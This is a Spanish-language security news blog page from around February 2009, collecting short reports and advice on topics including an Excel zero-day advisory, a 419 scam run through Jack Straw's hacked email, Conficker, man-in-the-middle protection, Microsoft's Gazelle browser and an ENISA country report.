Publicado el Boletín 131 - 28/02/2009

Boletín 131 - 28/02/2009

Los temas tratados son:

• ¿Es legal buscar puertos abiertos en sistemas ajenos?
• Análisis de un ataque de malware basado en web
• Nuevo Blog de Segu-Info
  
• Apoya a Segu-Kids, Juntos en la Red

Leer Boletín

Seguir leyendo...

Microsoft presenta su Guía de Seguridad para Pymes

Microsoft ha publicado una Guía de Seguridad para PyMEs que se titula "9 pasos para implementar la seguridad en su empresa", en la que describe los pasos prioritarios que una empresa debe implementar para proteger su entorno.

Desde Microsoft advierten que los riesgos a los que se ven expuestas las empresas hacen necesario la creación de directrices que orienten hacia un uso responsable de los recursos, así como las políticas de seguridad son documentos que constituyen la base del entorno de seguridad de una empresa y deben definir las responsabilidades, los requisitos de seguridad, las funciones, y las normas a seguir por los empleados de la empresa.

Además ofrece a las empresas que lo deseen evaluar los puntos débiles de su entorno de seguridad de IT mediante una herramienta gratuita de Evaluación de Seguridad de Microsoft (MSAT), diseñada para ayudar a las organizaciones de menos de 1.000 empleados, que podéis encontrar en la página de la ”Herramieta de evaluación de seguridad”.

La Guía de Seguridad de Microsoft para Pymes os uno de los documentos que os recomendamos leer, ya que define las bases de seguridad de una empresa.

Fuente: WebSecurity

Seguir leyendo...

Remodelación de este Blog

En este momento nos encontramos remodelando este Blog por lo que no es extraño que pueda notar errores en la visualización o que se experimenten cambios repentinos en distintas secciones del mismo.

Esperamos que el cambio sea para mejor y que se sienta cómodo en el mismo. Cualquier consulta puede hacerla llegar a nuestro formulario de Contacto.

Cristian

Seguir leyendo...

Informe de la situación de las Redes y de Seguridad de la Información en 30 países de Europa

Los informes de los países son una evaluación de las actividades en curso y previstas de NIS en cada Estado miembro. Como tal, proporciona una visión general sobre el "estado del arte" en NIS en 30 países europeos: los 27 Estados miembros de la Unión Europea y los 3 países del EEE [Islandia, Liechtenstein y Noruega].

Cada capítulo contiene por ejemplo, país; País destacados, las principales partes interesadas Descripción, actividades, y las tendencias actuales, por ejemplo, centrándose en la situación de los regímenes nacionales de identificación electrónica, y las principales incidencias de fallos de seguridad que provocaron la pérdida de datos.

La clasificación y cartografía de los interesados y sus relaciones mutuas fue uno de los objetivos más importantes del informe.

Las áreas más importantes en los que las organizaciones de nivel nacional tienen un impacto en los NEI fue trazado, a saber: Desarrollo de políticas: la redacción de, o asistencia en el proceso de elaboración, las políticas gubernamentales relativas a los NEI, NEI Aplicación de Políticas, Privacidad y Protección de Datos, Comunicaciones electrónicas, CIP / CIIP: la protección de infraestructuras críticas / protección de infraestructuras críticas de información, y [CERT]s: Computer Emergency Response Team.

El informe encuentra, no es sorprendente, que las instituciones y las responsabilidades varían sustancialmente de un país a otro. Sin embargo, algunas tendencias generales fueron identificados:

• Los actores más importantes para la definición de las políticas de los NEI y los organismos gubernamentales: por ejemplo, el Ministerio de Comunicaciones, la Agencia Nacional de Reglamentación de las Comunicaciones Electrónicas (cuando se establezca), la Oficina Nacional para la Protección de Datos, el Ministerio del Interior, Defensa, o haber compartido responsabilidades de las diferentes áreas de NIS.


• Red pública y Cuerpos de Seguridad de la Información: Público NEI con amplias responsabilidades en los órganos existen en alrededor de un tercio de los países. Sus tareas principales son, por ejemplo. la recopilación de información para cuestiones de seguridad de TI y el asesoramiento científico. Muchos también aprobar y certificar la seguridad de los sistemas nacionales de información.


• CERT: Hay más de 100 CERT activa en la UE, pero su distribución geográfica es muy desigual. Casi todos los países tienen 1 o 2 del sector público CERT. La mayoría de CERT actúa como punto nacional de contacto con los NEI y coordinar la respuesta a las crisis.

Fuente: IBLS y ENISA

Seguir leyendo...

Correos cifrados en Windows

Han pasado muchos inviernos y muchas cosas han cambiado desde entonces, pero lo que más me llama la atención es que, aunque la privacidad está ahora mucho más acosada que nunca y el uso de cifrado es muchísimo más sencillo, la cantidad de mensajes que se cifran no ha hecho más que menguar. Y creo disponer de un observatorio privilegiado que me permite sustentar esta afirmación...

• Emails cifrados en Windows (I)
• Emails cifrados en Windows (II)
• Emails cifrados en Windows (III)
• Emails cifrados en Windows (IV)
• Correo seguro para principiantes (I)
• Correo seguro para principiantes (II)
• Correo seguro para principiantes (III)
• Cifrado en GMail
  

Seguir leyendo...

Cloud computing: un modelo poco seguro para las empresas

De acuerdo con los resultados de un reciente estudio de IDC, los beneficios de los entornos cloud computing citados con mayor frecuencia por los usuarios fueron la velocidad y el menor coste de implantación de nuevas aplicaciones, así como la ventaja de pagar sólo por la capacidad que se utilice. También juegan en su favor factores como la menor necesidad de personal de TI y el acceso a las últimas tecnologías. Sin embargo, IDC pone de manifiesto que los clientes todavía tienen ciertos temores sobre este nuevo modelo emergente debido a su percepción como poco seguro. Según la consultora, mantener la seguridad de los datos es fundamental, y las empresas deben ser realistas sobre el nivel de seguridad que tienen en su negocio.


Esta polarización en la percepción de cloud computing por los responsables de TI se constata también en un estudio realizado por Kelton Research para Avanade. La mayoría de las empresas y ejecutivos de TI afirman que cloud computing es una opción de tecnología viable que puede mejorar los resultados finales de una empresa, al permitir reducir costes y una mayor agilidad para responder a las condiciones del mercado. De hecho, el 71% de los ejecutivos y responsables TI de 17 países encuestados ven el nuevo modelo como una opción tecnológica real. Y casi dos de cada tres (el 65% en concreto) creen que reduce los costes iniciales de TI. Otras ventajas asociadas a cloud computing citadas por los profesionales sondeados son una más rápida reacción a las condiciones del mercado, poder acceder a las últimas tecnologías, incremento de la flexibilidad y capacidad para que la empresa se centre en su negocio.

Sin embargo, con un coeficiente de 5 a 1 los profesionales sondeados afirman confiar más en los sistemas internos existentes que en los basados en cloud debido al temor a las amenazas de seguridad y a la pérdida del control de datos y sistemas. Esto explicaría en gran parte que más del 80% de los que usan sólo sistemas de TI internos propios no se plantean integrar ninguna forma de cloud computing durante los próximos meses.

Fuente: IDG

Seguir leyendo...

Microsoft trabaja en un nuevo navegador: Gazelle

El gigante del 'software' quiere hacer de la seguridad el gran estandarte del sustituto de Internet Explorer.

Internet Explorer tiene las horas contadas. Aunque se encuentra en una fase muy primaria de desarrollo, Microsoft ha desvelado que trabaja en un nuevo navegador, Gazelle, que pretende revolucionar un mercado que siempre ha dominado, pero en el que los competidores son cada vez más y mejores.

La compañía que dirige Steve Ballmer centrará el nuevo desarrollo en la seguridad, una de las grandes preocupaciones de los internautas de todo el mundo según indican todas las encuestas y estudios.

Precisamente la seguridad ha sido el principal caballo de batalla que han usado desde siempre los detractores de Internet Explorer, quienes veían en Safari, Firefox, Opera o Chrome programas menos expuestos a ataques informáticos.

Para conseguir su objetivo, Microsoft ha concebido Gazelle (gacela en inglés) como un sistema operativo, por lo que podría administrar de forma independiente la seguridad. El equipo encargado de desarrollar Gazelle asegura en una de las páginas web oficiales de Microsoft que no existe ningún navegador de las características del que ellos preparan.

De momento, la compañía no ha ofrecido fecha alguna para su posible lanzamiento, si quiera en fase beta (en pruebas), y reconocen que el proceso de desarrollo se encuentra en una fase muy inicial.

Desde el anuncio, realizado el pasado 19 de febrero, son multitud los blogs y medios especializados que se han hecho eco de la noticia y de cómo será esa nueva arquitectura que, promete, dotará al nuevo navegador de una gran seguridad.

Características

No, no es un chiste. Al menos no uno intencional. Es una afirmación de Microsoft Research. El navegador, que llevará el nombre Gazelle, estará compuesto por un kernel de 5.000 líneas en C# y, tal cual Chrome, crearía diferentes procesos por demanda, totalmente aislados de los recursos del sistema. Ambas cosas, supuestamente, le ayudarían a Gazelle a ser super seguro. Aún es un prototipo, no hay enlace de descarga, pero parece que la cosa viene en serio. Que no, no es broma.

Seguramente fue un shock. O tal vez pensaste que era el Día de los Inocentes. Pero no, eso de Navegador ultra-seguro de Microsoft no lo decimos nosotros, es una afirmación de Microsoft Research. La idea detrás de Gazelle, tal es el nombre de este navegador, es separar en diferentes procesos todas las demandas recibidas. Estas demandas serán administradas por el kernel del navegador (5.000 líneas en puro C#), que gestionaría todos los accesos directos al sistema operativo y a las redes. El rendereado de páginas solo podría acceder a los recursos indirectamente, vía API o solo Kernel mediante.

También, y a diferencia de Chrome, los procesos se crearían por dominio, y no por pestaña. Por ejemplo, una página que carga un vídeo de YouTube, estaría dividida en dos procesos. El vídeo de YouTube sería un huésped del sitio madre y no tendría acceso a ningún otro lugar del sitio, más allá del iframe. Por su parte, el sitio madre solo manejaría las dimensiones del iframe, pero no tendría acceso a su contenido. Esta separación de procesos por dominio sería tan severa que incluso los subdominios de un dominio serían tratados como procesos diferentes. Todos los procesos estarán aislados de sí mismos y del sistema.

Gazelle no separaría JavaScript, CSS y HTML en diferentes ítems a renderizar. Todo lo referente al rendereado partiría de una sola fuente, contenida en un solo proceso. Ese proceso, por su lado, forma parte de uno de los “principales”. Los principales podrían comunicarse con el Kernel y consigo mismo, pero solo mediante una API. Separar procesos y distinguir a estos principales serviría para manejar, entre otras cosas, los eventos generados por el usuario. Por ejemplo, un clic del ratón sería desviado al principal a cargo del área en la que se pinchó, imposibilitando así la acción de los scripts responsables del Clickjacking.

Todo esto, que puede resultar super confuso (y de dudosa implementación real), está ampliado y mucho mejor explicado en el paper The Multi-Principal OS Construction of the Gazelle Web Browser, que puedes descargar en el sitio de Microsoft Research. Aquellos que han probado el prototipo lo señalan como “pasable”. Ya veremos, en el futuro, cómo funciona.

Fuente: El Pais y NeoTeo

Seguir leyendo...

Estafa Nigeriara contra el ministro de Justicia británico

Los colegas de Jack Straw recibieron hace unos días lo que parecía un mensaje un tanto escamante del ministro de Justicia británico. "He extraviado mi cartera camino del hotel, en la que tenía todo el dinero y otros objetos de valor. Necesito que me ayudes urgentemente con un pequeño préstamo para pagar la cuenta del hotel y regresar a casa", decía el político presuntamente atrapado en Lagos, la capital de Nigeria.

El mensaje correspondía a la dirección electrónica del diputado laborista en Blackburn, su distrito electoral. La cantidad solicitada a 200 de sus allegados para salir del apuro eran 3.000 libras (3.300 euros). Solo uno contestó, aunque no mandó dinero. Straw aclaraba en la nota que se hallaba asistiendo en el país africano a una cumbre para ayudar a los jóvenes a luchar contra el racismo. La realidad era, claro está, muy distinta.

El ministro, ajeno a lo que sucedía, trabajaba en su despacho del Parlamento en Londres, cuando empezó a recibir llamadas de varios miembros de la circunscripción. "Me preguntaban si de verdad estaba en Nigeria y necesitaba 3.000 libras", relata.

"Era obviamente ridículo que me hubiera ido de senderismo a África y hubiera perdido la cartera", afirma el hombre que al frente del Departamento del Interior creó en el 2001 una de las primeras unidades policiales del mundo para luchar contra el fraude en internet. Ahora, precisamente él ha sido víctima de una de esas bandas de delincuentes. Los hackers nigerianos entraron en su correo oficial de Blackburn y utilizaron la agenda de contactos para enviar las misivas.

El alcalde de la localidad, Mohamed Khan, fue uno de los que recibió el mensaje, "al igual que mucha otra gente". "Es malo que alguien pueda creer que Jack Straw está pidiendo dinero", se lamenta el dirigente.

La escaramuza, sin consecuencias aparentes, ilustra la osadía de las mafias nigerianas que operan en la red. Las fechorías de unos pocos han convertido el nombre de Nigeria en sinónimo de un fraude internacional, conocido como 419 scam, el número del Código Penal nigeriano atribuido al popular delito.

Desde los cibercafés de Lagos, miles de buscavidas tratan cada día de limpiar alguna cuenta bancaria en cualquier rincón del mundo. Faxes, cartas y sobre todo correos electrónicos son los anzuelos para tentar a los crédulos sin fronteras.

El mensaje, muy respetuoso y en un inglés precario, tiene un formato fijo, aunque la historia ofrezca a veces variantes muy novelescas. En una ocasión se trata de una fortuna dejada por un familiar lejano, a disposición de quien recibe la nota. En otra, se invoca falsamente a la Cámara de Comercio e Industria de Nigeria o la Compañía Nacional de Petróleo para pedir colaboración en el blanqueo de dinero.

A veces, en lugar de apelar a la avaricia del destinatario, se intenta conmover su buen corazón. Hay relatos lacrimógenos, protagonizados por pobres viudas, huérfanos y perseguidos políticos, que han dejado una fortuna en su país y solo un extranjero puede recuperarla. En todas las ocasiones, el remitente cita la mediación de un abogado, pide datos bancarios y una cantidad para gastos de gestión y transferencia. Ese primer pellizco oscila al principio entre las 2.000 y las 3.000 libras. Si alguien cae en la trampa y tiene la desgracia de contestar, la cifra irá subiendo, alegando nuevas gestiones e imprevistos y reclamando más dinero, que no volverá a ver.

Incidentes caros

El instituto de observación Chatham House estimaba en el 2006 que solo en el Reino Unido este tipo de incidentes ha costado "150 millones de libras al año y unas 31.000 libras de media a cada víctima". En Estados Unidos, la Liga de Consumidores Nacionales apunta al fraude procedente de Nigeria como "el delito en la red de mayor crecimiento".

En España, los estafadores nigerianos orquestaron desde Málaga el envío masivo de cartas a Norteamérica y al norte de Europa, anunciando sabrosos premios de una supuesta "lotería española". Un falso directivo de la Organización Nacional de Loterías y Apuestas del Estado comunicaba al destinatario haber sido agraciado en un sorteo, en el que ni siquiera había participado. Para recibir la suma era necesario adelantar los gastos de gestión y los impuestos.

En un año hubo más de 1.500 denuncias, aunque muchos de los que picaron prefirieron callar por vergüenza. La llamada operación Nilo terminó con más de 300 nigerianos detenidos en Andalucía.

Fuente: El Periodico

Seguir leyendo...

El Service Pack 2 de Windows Vista/Server 2008 saldrá antes que Windows 7

En Microsoft han anunciado que se está preparando un Service Pack 2 para Windows Vista, que vendrá acompañado del SP2 de Windows Server 2008. Y según indican en ZDNet, ambas actualización estarían disponibles antes del lanzamiento de Windows 7, el que debería ocurrir en el segundo semestre del 2009.

¿Qué es lo que se quiere lograr con esto? Pues evitar que las ventas de Vista decaigan en el periodo cercano a la salida de Windows 7, y reducir la confusión que acerca de si es mejor seguir con Windows Vista/Server 2008 SP2 o hacer upgrade hacia Windows 7 (lo que de todas maneras ocurrirá, pero será en menor grado que si el SP2 se lanzara después o en la misma fecha que Windows 7).

Seguir leyendo...

Delincuentes virtuales piden $3.500 en nombre del Ministro de Justicia británico

Cibercriminales penetraron en la cuenta de correos personal de Jack Straw, ministro de justicia de Gran Bretaña, poniendo a sus contactos en peligro de ser víctimas de una estafa nigeriana.

Los delincuentes enviaron un mensaje a todos los contactos de la cuenta de Hotmail de su víctima haciéndose pasar por Straw.

El mensaje explicaba que Straw se encontraba en Nigeria haciendo un trabajo social en contra del racismo cuando perdió su billetera.

Por esa razón, se pedía a los destinatarios del correo que depositaran 3.500 dólares para ayudar a Straw a pagar los gastos del hotel y regresar a Gran Bretaña.

Entre los destinatarios del mensaje se encontraban oficiales del ministerio, miembros de partidos políticos y colaboradores.

“Comencé a recibir llamadas telefónicas de varios colaboradores preguntando si de verdad estaba en Nigeria y necesitaba 3.000 dólares”, dijo Straw.

Además, una persona respondió al correo para asegurarse de que Straw estaba bien, pero no llegó a enviar el dinero.

A pesar de la atención que recibió el ministro a causa de este problema, parece que nadie cayó en la trampa.

Straw afirmó que, aunque el correo fraudulento llegó a un "número significativo de personas", no se ha puesto en riesgo la seguridad nacional porque los delincuentes ingresaron a su cuenta personal, no a la ministerial que utiliza para tratar asuntos del gobierno.

Todavía no se sabe qué hicieron los delincuentes para ingresar a la cuenta. Los expertos creen que es posible que hayan averiguado su contraseña o que hayan respondido a su pregunta de seguridad, como pasó el año pasado con la gobernadora Sarah Palin.

Hotmail ha bloqueado la cuenta afectada para evitar que los cibercriminales la sigan atacando.

Fuente: Viruslist

Seguir leyendo...

Como protegernos del ataque del hombre en el medio o intermediario

El ataque del intermediario o man-in-the-middle (MitM) como se lo conoce en ingles es un ataque donde un ciberdelicuente es capaz de interceptar y modificar los mensajes de dos usuarios sin que estos se den cuenta. La compañía Verisign en la conferencia Black Hat ha dado una serie de consejos para usuarios y empresas sobre como protegernos de un nuevo tipo de ataque MitM.

Esta nueva variante de ataque es la ultima versión del mismo donde un usuario puede ser engañado y enrutado al sitio web equivocado. Lo diferente de este ataque es lo de lo sofisticado de las diferentes señales visuales que presenta en la cual reemplazan el favicon del sitio fraudulento con un icono de candado el cual tradicionalmente ha sido usado para representar a un sitio protegido con SSL. Pero a pesar de reproducir el candado este esquema de ataque no puede reproducir el indicador legitimo de HTTPS o el brillo verde que puede ver en la barra de navegación.

Consejos para protegerse del ataque MitM :

Para usuarios finales:

• Verifique el “brillo verde” en la barra de navegación ya que los cibercriminales no tienen acceso a los certificados SSL.
• Baje la ultima versión de su navegador.
• Use credenciales de autenticación tales como tokens autenticacion de dos factores para accesar las cuentas importantes.
• Maneje los emails de desconocidos con un alto grado escepticismo y no haga clicks en los enlaces para accesar sitios seguros mejor escriba usted mismo la dirección en la barra de navegación del navegador.

Para empresas:

• Adopte EV SSL y eduque a los usuarios de que significa el brillo o color verde en la barra de navegación.
• No ofrezca logins en paginas que no están previamente en una sesión de SSL.
• Ofrezca autenticacion de dos factores a sus clientes como una via opcional para agregar otra capa de seguridad para accesar las cuentas.
• No incluya enlaces en los emails para sus clientes, y motívelos a bajar y usar la versión mas reciente de sus navegadores de internet.

Fuente: TecnoSeguridad.net en una traducción de Net-Security

Seguir leyendo...

Barack Obama se prepara para enfrentar una "ciberguerra"

Ordenó revisar las iniciativas oficiales de seguridad informática. Y su presupuesto incluye un aumento de los recursos para proteger las redes tecnológicas.

El presupuesto del presidente Barack Obama incluye un sustancial financiamiento que apunta a mejorar la seguridad de las redes informáticas públicas y privadas en los Estados Unidos, alimentando a un creciente mercado de defensa y tecnologías de la información.

"La amenaza a las redes federales de tecnologías de la información es real, seria y creciente", dice un resumen de la propuesta presupuestaria para el año fiscal 2010, que comienza el 1 de octubre, lanzada por el gobierno de Obama el jueves.

Funcionarios de Gobierno y empresas privadas están cada vez mas preocupadas por ataques o interrupciones en las redes informáticas que son tan importantes para la economía de Estados Unidos, lo que motivó a Obama a ordenar una revisión de 60 días de las iniciativas de ciberseguridad en el Gobierno.

Autoridades del Gobierno y la industria dijeron que un simulacro de "ciberguerra" realizado en diciembre descubrió que Estados Unidos no esta preparado para un gran ataque hostil en contra de sus redes informáticas.

La visión general del presupuesto dado a conocer el jueves propone entregar al Departamento de Seguridad Interna un financiamiento de 355 millones de dólares para hacer mas resiliente y segura a la infraestructura cibernética del sector público y privado.

Además, la administración afirmó, según informó la agencia Reuters, que destinaría fondos "sustanciales" de ciberseguridad para el programa nacional de Inteligencia, pero no entregó mayores detalles porque el financiamiento es mantenido en secreto.

Parte de ese financiamiento irá a la Agencia de Seguridad Nacional (NSA, por sus siglas en inglés), que es el órgano gubernamental responsable de realizar decodificaciones y espionaje electrónico.

El almirante Dennis Blair, director de Inteligencia nacional, le dijo el miércoles al Congreso que la NSA asumirá un rol mayor en la ciberseguridad.

Las empresas contratistas de Defensa Northrop Grumman Corp , Lockheed Martin Corp , Boeing Co , y General Dynamics Corp están trabajando en proyectos de seguridad para el Gobierno de Estados Unidos y podrían verse beneficiadas por el mayor financiamiento.

Fuente: Infobae Profesional

Seguir leyendo...

Vulnerabilidad crítica en Excel podría estar siendo explotada desde hace dos meses

El pasado 24 de febrero, Microsoft reconoció en una nota oficial que estaban investigando la existencia de una nueva vulnerabilidad en Office Excel que podría permitir la ejecución remota de código si un usuario abre un archivo Excel especialmente manipulado.

La vulnerabilidad, de la que se han dado pocos detalles, estaría causada por una referenciación a un objeto no válido al abrir un documento Excel, lo que podría permitir la ejecución de código. Si el usuario abriese el archivo con permisos de administrador, el atacante podría tomar completo control del sistema afectado.

De acuerdo con la nota de Microsoft, la vulnerabilidad estaría siendo explotada en "ataques limitados a objetivos concretos" y no de forma masiva. Esta información coincide con la apuntada por Vincent Weafer (vicepresidente del equipo de respuestas de seguridad de Symantec), afirmando que el fallo estaba siendo aprovechado para comprometer sistemas en Asia, principalmente en oficinas gubernamentales y de grandes corporaciones.

Microsoft ha confirmado que los siguientes productos y versiones están afectados por la vulnerabilidad, pasando a ser objetivos de ataque:

• Microsoft Office Excel 2000 Service Pack 3
• Microsoft Office Excel 2002 Service Pack 3
• Microsoft Office Excel 2003 Service Pack 3
• Microsoft Office Excel 2007 Service Pack 1
• Microsoft Office Excel Viewer 2003
• Microsoft Office Excel Viewer 2003 Service Pack 3
• Microsoft Office Excel Viewer
• Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007
• File Formats Service Pack 1
• Microsoft Office 2004 for Mac
• Microsoft Office 2008 for Mac

Dada la amplia gama de productos afectados, se recomienda encarecidamente no abrir archivos Excel de dudosa procedencia. Como se puede apreciar, Office para Mac también está entre las versiones vulnerables, por lo que estas precauciones se hacen extensibles a los usuarios de la suite ofimática sobre sistemas operativos de Apple.

En la entrada titulada "Detection Added For The New 0-day In Excel" del blog de investigación y respuesta ante amenazas del Microsoft Malware Protection Center se añade algo de información adicional. Se especifica que los archivos maliciosos se usarían como 'droppers', encargados de descargar e instalar otro tipo de malware, y además se proporciona una pequeña lista con los hashes SHA1 de algunos de los archivos que contienen el exploit. Serían estos:

46181cf01e08b1760cecac95bbd486dd3b808988
6605bf6aee31f0cb2370d684aa32e5a588d4aaf4
675b12b1e50c9463576061cf5181a3f58dc30e59
7fe5481b1edc4df99488f5cc0f65f70fa35978d6
968ad6a8259ddf5f9705fef2ba2eaa3b63b1626f

Haciendo una búsqueda del primer hash en VirusTotal.com se puede apreciar que dicho archivo fue enviado y analizado por primera vez el pasado 26 de diciembre. Dato indicativo de que una primera versión del exploit podría estar siendo utilizada desde hace más de dos meses.

En ese momento era detectado por 6 de los 39 motores de VirusTotal. Si realizamos ahora el análisis de la misma muestra la cosa no ha cambiado mucho. A los 6 motores que lo detectaban entonces se ha sumado otro más, el de Microsoft, que lo identifica con una firma específica (Exploit:Win32/Evenex.gen).

Todavía no se sabe cuando estará disponible una actualización de seguridad para Excel. Es posible que vea la luz el próximo martes día 10 de marzo cumpliendo con el ciclo de actualizaciones de seguridad programadas por Microsoft. Aunque dada la importancia del fallo, cabe la posibilidad de que se publique como actualización independiente y fuera del ciclo.

Como contramedida, Microsoft recomienda la utilización de MOICE para Office 2003 y 2007 (Microsoft Office Isolated Conversion Environment, es decir, Entorno aislado de conversión de Microsoft Office) para abrir los archivos no confiables. MOICE convertiría los documentos binarios de Office a un nuevo formato XML abierto, mecanismo para que los clientes preprocesen los documentos binarios de Office potencialmente no seguros.

También se recomienda, cuando sea posible, el uso de otras suites ofimáticas como OpenOffice, para abrir los archivos no confiables o de dudosa procedencia.

Más Información:

Microsoft Security Advisory (968272): Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/968272.mspxTrojan.Mdropper.AC
http://www.symantec.com/security_response/writeup.jsp?docid=2009-022310-4202-99&tabid=1

Microsoft Malware Protection Center - Threat Research & Response Blog:Detection Added For The New 0-day In Excel
http://blogs.technet.com/mmpc/archive/2009/02/25/detection-added-for-the-new-0-day-in-excel.aspx

VirusTotal.com (26/12/2008 - SHA1: 46181cf01e08b1760cecac95bbd486dd3b808988)
http://www.virustotal.com/analisis/fab147fe0e294c4eceb43961324d7fbd

Descripción de la actualización del Entorno aislado de conversión de Microsoft Office (MOICE)
http://support.microsoft.com/kb/935865

Autor: Pablo Molina

Fuente: Hispasec

Seguir leyendo...

¿Tropezamos con la misma piedra?

¿Para qué repetir los errores antiguos habiendo tantos nuevos para cometer?

Esta frase condensa perfectamente la situación actual respecto a algunas vulnerabilidades importantes que hemos ido comentando en esto blog: Conficker, y la vulnerabilidad en Acrobat Reader.

Multitud de particulares, empresas de todos los tamaños y redes variopintas siguen sufriendo los efectos del gusano Conficker, y parece que aún a estas alturas no somos conscientes de la importancia de la Seguridad en nuestros procesos de negocio, o en nuestro día a día personal. Que ahora muchos administradores estén parcheando a toda velocidad debido a que sus cuentas de usuario se están bloqueando es querrer construir la casa por el tejado. Por desgraciado que suene, gusanos como Conficker nos hacen darnos cuenta de la realidad, realidad que signifca que muchos de nuestros activos críticos (tangibles e intangibles) están a merced de terceros si no nos tomamos las cosas en serio, que pueden acabar fuera de nuestras redes sin nosotros enterarnos o que se están usando los servidores de nuestra red para delitos de spam, blanqueo de dinero o cualquier otro tipo de fraude.

¿Somos conscientes que los ordenadores de nuestro departamento de RRHH, de nuestros directivos, de las personas que manejan la información sensible de la empresa o de nuestros trabajadores pueden estar ahora mismo controlados por un tercero? ¿Cuántos quebraderos de cabeza nos está dando un simple gusano que hace que todas las cuentas del directorio activo se bloqueen, haciendo que los usuarios no puedan entrar en sus equipos, navegar o ver su correo? ¡Estamos parando toda la actividad empresarial de muchas empresas a veces incluso durante días!

¿Cuándo nos vamos a dar cuenta de que la Seguridad es algo que tiene que estar presente en todas nuestras acciones y procesos de negocio?

Pero la culpa la tenemos todos, usuarios, fabricantes y todos los que estamos relacionados; hasta el próximo 11 de Marzo no estará disponible el parche de Acrobat Reader para algunas versiones, y para el 18 de Marzo para el resto de versiones. Hasta entonces, la vulnerabilidad se está explotando activamente (desde Diciembre), infectando miles de equipos sin que podamos protegernos. Adobe está en contacto con fabricantes de IDS/IPS y antivirus para que puedan detectar los intentos de explotar esta vulnerabilidad, pero como siempre se demuestra, es imposible detectar todos los exploits y variantes que existan, más aún cuando los detalles de la vulnerabilidad son públicos como es el caso. En resumen, que hasta el 11 de Marzo es mejor que no abramos ningún PDF ¿cómo puedo hacer que mis usuarios hagan lo mismo?.

Estos dos hechos son ejemplos de comportamientos que debemos mejorar, tanto los usuarios como los fabricantes, puesto que parece que en vez de 2009 estamos en 2003:

El nuevo gusano Blaster se propaga a gran velocidad infectando equipos en todo el mundo (2003)
El Blaster tuvo parte de la culpa por el gran apagón (2003)
Un virus informático llamado 'Mydoom.A' colapsa entornos corporativos (2004)
Virus informáticos en el Ejército alemán (2009)
Un gusano informático infecta de forma "masiva" millones de ordenadores (2009)
Las llaves de memoria USB propagan un virus por millones de ordenadores (2009)

Autor: Bertrand Russell
Fuente: S21sec

Seguir leyendo...

Microsoft habilita la deshabilitación del 'Autorun'

Enorme Agujero de Seguridad emparchado, de alguna forma

Por una vez, es tiempo de buenas noticias. Microsoft liberó una actualización "no de seguridad" esta semana que soluciona una falla en la característica de autorun para discos [y otros medios de almacenamiento removibles.]

Como acostumbra tradicionalmente Microsoft, la actualización es descripta como no relacionada con seguridad , aunque la falla en cuestión viene a ser una de las razones por las cuales el virus Conficker se sigue propagando. Efectivamente, el problema es el cual en ciertos casos, incluso cuando el registro está fijado para deshabilitar el autorun, el sistema ejecuta igualmente el autorun con lo que hubiera en el disco de red montado.

Sin dudas, los millones (estimados segun lo que dicen) de personas que poseen sistemas infectados con variantes del Conficker/Downadup se regocijaran sabiendo que ahora hay una forma menos por la cual las computadoras cargadas del malware podrán infectar a otros. Quizás ¿no sería tiempo de emparcharlo y que deje de existir completamente?

ACTUALIZACIÓN:
El parche apareció por primera vez en Mayo de 2008, pero era opcional y no se publicó mediante las actualizaciones automáticas. O sea, uno debía saber que existía para luego aplicarlo.

Documento informativo sobre seguridad de Microsoft (967940)
Actualización para la ejecución automática de Windows
Cómo corregir "Deshabilitar la clave de registro de ejecución automática" aplicación de Windows (Descarga)

Traducido para blog de Segu-info por Raúl Batista
Author: Razvan Stoica
Fuente: Malwarecity

Seguir leyendo...

Un tercio de las aplicaciones de Facebook serían peligrosas

Una empresa de seguridad informática recordó que la red social no revisa estas aplicaciones para los perfiles de los usuarios antes de que estén disponibles. La confianza queda en manos de extraños a la hora de instalar un programa.

Millones de invitaciones para distintas aplicaciones circulan por día entre los más de 175 millones de usuarios de Facebook. Expertos en seguridad informática revelaron que no todas ellas son confiables.

Según Sophos, una tercera parte de esas aplicaciones que los usuarios de Facebook instalan en sus perfiles pueden ser peligrosas debido a que la red social no las examina antes de que estén disponibles para su uso.

La información, dada a conocer por la agencia de noticias Europa Press, indica que se dan casos de amenazas que no llegan mediante aplicaciones, sino como los mensajes de advertencia han sido enviados por terceros. Es el caso de Error Check System, que ha bombardeado a algunos usuarios con falsos mensajes de notificación informándoles sobre supuestos problemas a la hora de visualizar sus perfiles por parte de sus amigos.

Sophos explicó que la idea de esa aplicación -spam- es reclutar más usuarios y, si tienen “suerte”, robarles información personal con fines económicos.

"Las aplicaciones de Facebook son muy populares", afirmó el consultor de tecnología de Sophos, Graham Cluley. "Pero su instalación entraña serios problemas como agujeros en la seguridad de los equipos, además de ser una invitación para que los hackers accedan al perfil de usuario y a la información almacenada en él".

"Tal y como se suele hacer con otras aplicaciones informáticas, es esencial poner cuidado cuando no se está seguro del origen, ya que el hecho de que determinadas personas lo hagan, no hace más segura una aplicación", concluyó Cluley.

Fuente: Infobae

Seguir leyendo...

Reflexiones sobre la falta de concienciación: copias de seguridad

Continuando con las reflexiones de lo que son tópicos de la inseguridad, lo siguiente que toca son las copias de seguridad. Tengo la sensación de que muchas de las tareas que forman parte de las rutinas básicas de seguridad son realizadas por los administradores sin haber asimilado la importancia de las mismas y cual es el objetivo que debe lograrse.
Cuando se toman decisiones sobre proteger algo, cualquier medida de seguridad debe responder a un por qué. El supuesto que se intenta evitar puede ser más o menos frecuente, más o menos posible, pero en cualquier caso, toda salvaguarda tiene como misión básica evitar una vulnerabilidad, reducir un impacto o ambas cosas a la vez.

Las medidas de recuperación, como es el caso de las copias de seguridad, pretenden que la organización pueda volver a la normalidad una vez que se ha producido un daño en el menor tiempo posible. Son actuaciones a posteriori cuando la amenaza ya se ha materializado y se debe reparar un daño. En el caso de las copias de seguridad hay dos preguntas básicas que responder.

Seguir leyendo

Seguir leyendo...

El 59% de los despedidos tomó información confidencial de sus ex empresas

Una encuesta realizada sobre 945 personas que han perdido sus puestos de trabajo en los últimos 12 meses pone de relieve que el 59% admite haber robado datos de sus respectivas ex-empresas una vez les comunicaron que no seguirían, mientras que un 67% reconoce haber utilizado información confidencial para conseguir un nuevo empleo.

Ahondando un poquito más en los datos que ha facilitado Ponemon Institute LLC, la empresa que ha recibido fondos de Symantec para realizar este trabajo, podemos comprobar cómo el 61% de los participantes en el sondeo que se sientieron maltratados por sus antiguas compañías decidieron llevarse consigo información, mientras que "sólo" el 26% de los que guardan un buen recuerdo hicieron lo propio.

